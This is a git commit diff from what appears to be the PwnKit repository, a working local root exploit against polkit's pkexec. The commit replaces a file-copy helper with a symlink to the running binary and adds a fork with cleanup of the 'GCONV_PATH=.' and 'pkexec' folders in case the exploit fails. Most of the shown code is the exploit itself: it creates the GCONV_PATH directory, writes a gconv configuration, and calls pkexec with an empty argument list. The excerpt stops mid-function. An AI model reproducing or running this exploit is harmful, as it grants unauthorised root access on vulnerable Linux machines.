Cleaned up

Used symlinks instead of copying self over
Remove artifact folders in case the exploit didn't work
This commit is contained in:
ly4k 2022-01-27 12:35:57 +01:00
parent 0b4fb44df8
commit 4bca1e6504
2 changed files with 25 additions and 70 deletions

BIN
PwnKit

Binary file not shown.

View File

@ -10,6 +10,7 @@
#include <unistd.h> #include <unistd.h>
#include <ftw.h> #include <ftw.h>
#include <sys/wait.h>
#include <sys/stat.h> #include <sys/stat.h>
#include <sys/types.h> #include <sys/types.h>
@ -30,69 +31,12 @@ int rmrf(char *path)
return nftw(path, unlink_cb, 64, FTW_DEPTH | FTW_PHYS); return nftw(path, unlink_cb, 64, FTW_DEPTH | FTW_PHYS);
} }
int cp(const char *from, const char *to)
{
int fd_to, fd_from;
char buf[4096];
ssize_t nread;
int saved_errno;
fd_from = open(from, O_RDONLY);
if (fd_from < 0)
return -1;
fd_to = open(to, O_WRONLY | O_CREAT | O_EXCL, 0755);
if (fd_to < 0)
goto out_error;
while (nread = read(fd_from, buf, sizeof buf), nread > 0)
{
char *out_ptr = buf;
ssize_t nwritten;
do
{
nwritten = write(fd_to, out_ptr, nread);
if (nwritten >= 0)
{
nread -= nwritten;
out_ptr += nwritten;
}
else if (errno != EINTR)
{
goto out_error;
}
} while (nread > 0);
}
if (nread == 0)
{
if (close(fd_to) < 0)
{
fd_to = -1;
goto out_error;
}
close(fd_from);
return 0;
}
out_error:
saved_errno = errno;
close(fd_from);
if (fd_to >= 0)
close(fd_to);
errno = saved_errno;
return -1;
}
void entry(void) void entry(void)
{ {
int res; int res, pid, status;
FILE *fp; FILE *fp;
ssize_t len;
char exe[PATH_MAX];
res = mkdir("GCONV_PATH=.", 0777); res = mkdir("GCONV_PATH=.", 0777);
if (res == -1 && errno != EEXIST) if (res == -1 && errno != EEXIST)
@ -118,13 +62,16 @@ void entry(void)
} }
fclose(fp); fclose(fp);
res = cp("/proc/self/exe", "pkexec/pkexec.so"); exe[readlink("/proc/self/exe", exe, sizeof(exe))] = 0;
res = symlink(exe, "pkexec/pkexec.so");
if (res == -1) if (res == -1)
{ {
perror("Failed to copy file"); perror("Failed to copy file");
_exit(1); _exit(1);
} }
if ((pid = fork()) == 0)
{
execve( execve(
"/usr/bin/pkexec", "/usr/bin/pkexec",
(char *[]){NULL}, (char *[]){NULL},
@ -139,6 +86,14 @@ void entry(void)
_exit(0); _exit(0);
} }
// Cleanup for situations where the exploit didn't work
wait(NULL);
rmrf("GCONV_PATH=.");
rmrf("pkexec");
_exit(0);
}
void gconv() {} void gconv() {}
void gconv_init() void gconv_init()
{ {